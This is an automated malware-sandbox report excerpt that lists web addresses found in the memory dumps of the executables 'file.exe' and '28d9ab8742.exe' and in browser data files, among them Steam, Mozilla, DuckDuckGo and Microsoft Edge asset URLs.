Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=1vfyNnvUqkgy&l=engl
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=f9Xv_dG_70Ca&l=english
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=Gr5o1d5GQef0&l=en
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=g9lbYg_WDvLO&l=e
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=HNbD--FePQTr&l=english
Source: 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&l=engl
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=2VOT8-1_tx9Q&l=en
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=oaWa21XUbd8h&am
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185565427.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000002.3199336706.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.fastly.steamstatic.ctem
Source: file.exe, 00000000.00000002.2518810297.00000000232D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875512562.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3007244384.0000000005EA5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3009195039.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, BKJKJEHJJDAKECBFCGID.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2518810297.00000000232D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875512562.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3007244384.0000000005EA5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3009195039.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, BKJKJEHJJDAKECBFCGID.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Reporting and NEL.10.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: file.exe, 00000000.00000003.2358800633.000000002327D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2848879088.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2838131813.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966097346.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2980327399.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965902429.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2979808969.0000000005EE1000.00000004.00000800.00020000.00000000.sdmp, IJECBGIJ.0.dr, ECGDBAEH.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2358800633.000000002327D000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2848879088.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2838131813.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966097346.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2980327399.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965902429.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2979808969.0000000005EE1000.00000004.00000800.00020000.00000000.sdmp, IJECBGIJ.0.dr, ECGDBAEH.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2358800633.000000002327D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492153777.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2848879088.0000000005737000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2838131813.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966097346.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2980327399.0000000005ED9000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965902429.0000000005ECF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2979808969.0000000005EE1000.00000004.00000800.00020000.00000000.sdmp, IJECBGIJ.0.dr, ECGDBAEH.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 0e09cae2-b3ca-49c8-af40-a29526af4444.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net
Source: 000003.log0.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log0.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log0.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
